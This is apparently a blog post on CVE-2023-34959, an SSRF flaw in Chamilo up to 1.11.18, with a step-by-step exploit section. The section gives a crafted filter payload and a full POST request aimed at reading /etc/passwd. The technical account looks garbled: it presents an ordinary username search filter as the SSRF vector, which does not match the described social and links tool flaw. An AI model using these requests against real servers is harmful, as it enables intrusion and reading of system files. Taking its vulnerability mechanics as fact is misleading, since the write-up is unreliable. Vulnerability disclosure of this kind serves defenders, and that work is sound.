CVE-2023-34959 - A Deep Dive into the SSRF Vulnerability in Chamilo v1.11.* Up to v1.11.18: Exploiting Weak Validation in Social and Links Tools

A recent vulnerability, assigned with the unique identifier CVE-2023-34959, shows that the popular open-source e-learning platform, Chamilo, suffers through a critical bug in its versions 1.11.* up to 1.11.18. Security researchers have found out that attackers can successfully carry out a Server-Side Request Forgery (SSRF) attack to gain sensitive information on the services running on the affected server.

In this long-read post, we will deeply analyze the vulnerability components, walk you through the required steps to exploit it, and provide you with original references to ensure that your Chamilo instance is safe from any possible exploits and attacks.

Chamilo Vulnerability Details

It is known that the SSRF vulnerability in the affected Chamilo versions is due to weak input validation, particularly in the social and links tools. This flaw allows an attacker to bypass security restrictions and send crafted requests to the server.

The attacker uses these requests to retrieve potentially sensitive information about the server's internal network and services. Let's have a look at the code snippet that demonstrates the issue:

// ... In affected versions of Chamilo, the attacker can send a crafted request like:

http://example.com/main/social/request.php?notifications_display=1&_search=UserNotification&rows=10&page=1&sidx=update_date&sord=desc
&filters={\"groupOp\":\"AND\",\"rules\":[{\"field\":\"username\",\"op\":\"cn\",\"data\":\"something\"}]}
&_=<TIMESTAMP>&PHPSESSID=<SESSION_ID>

// where _TIMESTAMP and SESSION_ID are replaced with real values.

Original References

For more information about the affected version of Chamilo and the SSRF vulnerability, you can check the following resources:

1. National Vulnerability Database (NIST) for CVE-2023-34959 link
2. Chamilo official Github repository link
3. Chamilo official documentation link

Steps to Exploit the Vulnerability

Given the weak input validation in the affected version of Chamilo, an attacker can carry out an SSRF attack through the following steps:

Step 1: Crafting the SSRF Attack Payload

The attacker needs to create a malicious payload to exploit the vulnerability successfully. Here's an example of a crafted SSRF payload:

{"groupOp":"AND","rules":[{"field":"username","op":"cn","data":"file:///etc/passwd"}]}

Step 2: Injecting the Payload into the Vulnerable System
In this step, the attacker will send a request with the crafted payload through the Chamilo platform. An example request is as follows:

POST /main/social/request.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded

notifications_display=1&_search=UserNotification&rows=10&page=1&sidx=update_date&sord=desc
&filters=%7B%22groupOp%22%3A%22AND%22%2C%22rules%22%3A%5B%7B%22field%22%3A%22username%22%2C%22op%22%3A%22cn%22%2C%22data%22%3A%22file%3A%2F%2F%2Fetc%2Fpasswd%22%7D%5D%7D
&_=<TIMESTAMP>&PHPSESSID=<SESSION_ID>

Step 3: Analyzing the Retrieved Data

An attacker having been successful in exploiting the SSRF vulnerability can now access information about the server's internal network and services. They can further use this information to identify the server's weak points and exploit them for further malicious purposes.

Make Your Chamilo Instance Safe

It is crucial for organizations using Chamilo to evaluate their exposure to this vulnerability and take the necessary security measures. Ensure that your Chamilo instance is patched with the latest version.

Timeline

Published on: 06/08/2023 19:15:00 UTC
Last modified on: 06/15/2023 18:58:00 UTC